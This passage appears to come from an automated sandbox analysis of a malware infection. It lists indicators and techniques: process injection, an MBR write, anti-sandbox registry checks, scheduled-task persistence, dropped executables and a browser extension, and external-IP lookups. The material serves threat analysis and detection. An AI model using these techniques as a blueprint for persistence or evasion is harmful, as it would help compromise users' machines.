queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Display Inline Images kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\SmoothScroll kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\UseHR kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Text Scaling kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Larger Hit Test kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\MenuExt kav21.3.10.391en_26075.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab kav21.3.10.391en_26075.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\UseSWRender = "1" kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Move System Caret kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Enable AutoImageResize kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\International\Scripts kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Styles kav21.3.10.391en_26075.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Updater.exekav21.3.10.391en_26075.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Updater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kav21.3.10.391en_26075.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 535 ipinfo.io 618 api.2ip.ua 1191 api.ipify.org 1435 myexternalip.com 366 ipinfo.io 367 ipinfo.io 534 ipinfo.io 593 api.2ip.ua 705 api.2ip.ua 1242 myexternalip.com 1430 api.2ip.ua 343 ipinfo.io 487 ipinfo.io 488 ipinfo.io 721 api.2ip.ua 1248 myexternalip.com 1434 myexternalip.com 341 ipinfo.io 538 ipinfo.io 592 api.2ip.ua 630 myexternalip.com 631 myexternalip.com 1419 api.2ip.ua 1420 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
kav21.3.10.391en_26075.exedescription ioc process File opened for modification \??\PhysicalDrive0 kav21.3.10.391en_26075.exe -
Drops file in System32 directory 21 IoCs
Processes:
Install.exeInstall.exeInstall.exeInstall.exeInstall.exerkfree_setup64.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy Install.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\rvlkl.exe rkfree_setup64.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe File opened for modification C:\Windows\System32\GroupPolicy Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy Install.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe File opened for modification C:\Windows\System32\GroupPolicy Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Updater.exepid process 8360 Updater.exe -
Suspicious use of SetThreadContext 36 IoCs
Processes:
Hees5gyHhxQ9S2TKRxCAvjcm.exe49AAFB727CL5GDI.exevqaxOmEozavyS1F_VZNHcPSf.exe0M20GBJKA66FG9A.exeKBHKAC88D1F3HM2.exedllhusts.exeOtV01fNRpBSqIMPnvBIz_5U1.exeqkftJGDPHrj6GpoYfaz9kGzw.exeMmwt5y3s3zj3YZRq2H7QWLkZ.exeOtV01fNRpBSqIMPnvBIz_5U1.exebuild2.exe1CEC.exe3EEC.exe1CEC.exebuild2.exebuild3.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeOtV01fNRpBSqIMPnvBIz_5U1.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeOtV01fNRpBSqIMPnvBIz_5U1.exemstsca.exemstsca.exedescription pid process target process PID 2612 set thread context of 2204 2612 Hees5gyHhxQ9S2TKRxCAvjcm.exe Hees5gyHhxQ9S2TKRxCAvjcm.exe PID 40852 set thread context of 50956 40852 49AAFB727CL5GDI.exe 49AAFB727CL5GDI.exe PID 4324 set thread context of 50916 4324 vqaxOmEozavyS1F_VZNHcPSf.exe AppLaunch.exe PID 51104 set thread context of 50772 51104 0M20GBJKA66FG9A.exe 0M20GBJKA66FG9A.exe PID 50840 set thread context of 47800 50840 KBHKAC88D1F3HM2.exe KBHKAC88D1F3HM2.exe PID 744 set thread context of 3772 744 dllhusts.exe dllhusts.exe PID 2400 set thread context of 5632 2400 OtV01fNRpBSqIMPnvBIz_5U1.exe OtV01fNRpBSqIMPnvBIz_5U1.exe PID 3608 set thread context of 2068 3608 qkftJGDPHrj6GpoYfaz9kGzw.exe RegAsm.exe PID 3836 set thread context of 6728 3836 Mmwt5y3s3zj3YZRq2H7QWLkZ.exe InstallUtil.exe PID 8820 set thread context of 11168 8820 OtV01fNRpBSqIMPnvBIz_5U1.exe OtV01fNRpBSqIMPnvBIz_5U1.exe PID 4364 set thread context of 11340 4364 build2.exe build2.exe PID 12596 set thread context of 13612 12596 1CEC.exe 1CEC.exe PID 13780 set thread context of 70356 13780 3EEC.exe AppLaunch.exe PID 13752 set thread context of 70588 13752 1CEC.exe 1CEC.exe PID 14588 set thread context of 15284 14588 build2.exe build2.exe PID 15148 set thread context of 15464 15148 build3.exe build3.exe PID 19572 set thread context of 19608 19572 mstsca.exe mstsca.exe PID 22576 set thread context of 22652 22576 mstsca.exe mstsca.exe PID 25176 set thread context of 25240 25176 mstsca.exe mstsca.exe PID 35576 set thread context of 35636 35576 mstsca.exe mstsca.exe PID 36908 set thread context of 36924 36908 mstsca.exe mstsca.exe PID 38292 set thread context of 33528 38292 mstsca.exe mstsca.exe PID 41860 set thread context of 42096 41860 mstsca.exe mstsca.exe PID 44024 set thread context of 44128 44024 mstsca.exe mstsca.exe PID 46572 set thread context of 46604 46572 mstsca.exe mstsca.exe PID 46804 set thread context of 46828 46804 mstsca.exe mstsca.exe PID 46932 set thread context of 46960 46932 mstsca.exe mstsca.exe PID 47172 set thread context of 47392 47172 OtV01fNRpBSqIMPnvBIz_5U1.exe OtV01fNRpBSqIMPnvBIz_5U1.exe PID 47968 set thread context of 47984 47968 mstsca.exe mstsca.exe PID 47552 set thread context of 47740 47552 mstsca.exe mstsca.exe PID 48192 set thread context of 48228 48192 mstsca.exe mstsca.exe PID 48376 set thread context of 48408 48376 mstsca.exe mstsca.exe PID 48524 set thread context of 48544 48524 mstsca.exe mstsca.exe PID 48584 set thread context of 48608 48584 OtV01fNRpBSqIMPnvBIz_5U1.exe OtV01fNRpBSqIMPnvBIz_5U1.exe PID 48744 set thread context of 48768 48744 mstsca.exe mstsca.exe PID 48960 set thread context of 48980 48960 mstsca.exe mstsca.exe -
Drops file in Program Files directory 18 IoCs
Processes:
CDFD.exetW7Y0_b8aGCZGB9K4Cnu3Izl.exeelevation_service.exedescription ioc process File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js CDFD.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe tW7Y0_b8aGCZGB9K4Cnu3Izl.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\_metadata\verified_contents.json elevation_service.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\icon.png CDFD.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js CDFD.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js CDFD.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecoveryCRX.crx elevation_service.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js CDFD.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\manifest.json CDFD.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecovery.exe elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecovery.exe elevation_service.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\manifest.json elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\manifest.json elevation_service.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\_metadata\verified_contents.json elevation_service.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\background.html CDFD.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js CDFD.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js CDFD.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe tW7Y0_b8aGCZGB9K4Cnu3Izl.exe -
Drops file in Windows directory 30 IoCs
Processes:
csrss.exemsiexec.exeMsiExec.exeE35.execmd.exekav21.3.10.391en_26075.exedescription ioc process File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Installer\e68a853.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIAC5B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAC7C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB107.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB967.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC05E.tmp msiexec.exe File opened for modification C:\Windows\Installer\e68a853.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIAC6C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAE63.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAE73.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976} msiexec.exe File opened for modification C:\Windows\Installer\MSIB792.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log MsiExec.exe File created C:\Windows\Inf\oem0.PNF MsiExec.exe File opened for modification C:\Windows\rss E35.exe File created C:\Windows\rss\csrss.exe E35.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\java.job cmd.exe File opened for modification C:\Windows\installer kav21.3.10.391en_26075.exe File opened for modification C:\Windows\Installer\MSIB165.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB416.tmp msiexec.exe File created C:\Windows\Inf\oem1.PNF MsiExec.exe File opened for modification C:\Windows\Installer\MSIAB7F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAE43.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAF8E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAFBE.tmp msiexec.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 70624 sc.exe 20936 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 16960 1944 WerFault.exe X70ItBxukSvymp13PgQhBSOh.exe 6680 6496 WerFault.exe rundll32.exe 12056 11996 WerFault.exe 8B35.exe 12120 11976 WerFault.exe 80E3.exe 12912 12372 WerFault.exe rundll32.exe 13004 1248 WerFault.exe rundll32.exe 13296 13244 WerFault.exe F3F5.exe 67524 24400 WerFault.exe explorer.exe 19716 19588 WerFault.exe ddefwhh 47048 46916 WerFault.exe ddefwhh -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
0ESIFYudXNYZaYrWCRa9HdY_.exetaskmgr.exetaskmgr.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0ESIFYudXNYZaYrWCRa9HdY_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0ESIFYudXNYZaYrWCRa9HdY_.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0ESIFYudXNYZaYrWCRa9HdY_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build2.exebuild2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 15500 schtasks.exe 15844 schtasks.exe 15852 schtasks.exe 19632 schtasks.exe 22684 schtasks.exe 13516 schtasks.exe 70448 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 11648 timeout.exe 15636 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 11148 tasklist.exe 10780 tasklist.exe -
Enumerates system info in registry 2 TTPs 17 IoCs
Processes:
msedge.exeSearchApp.exemsedge.exemsedge.exechrome.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchApp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchApp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 11620 taskkill.exe 13188 taskkill.exe 15608 taskkill.exe 6944 taskkill.exe -
Processes:
explorer.exeKD005C2835911EG.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" KD005C2835911EG.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch KD005C2835911EG.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" KD005C2835911EG.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync KD005C2835911EG.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
E35.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight 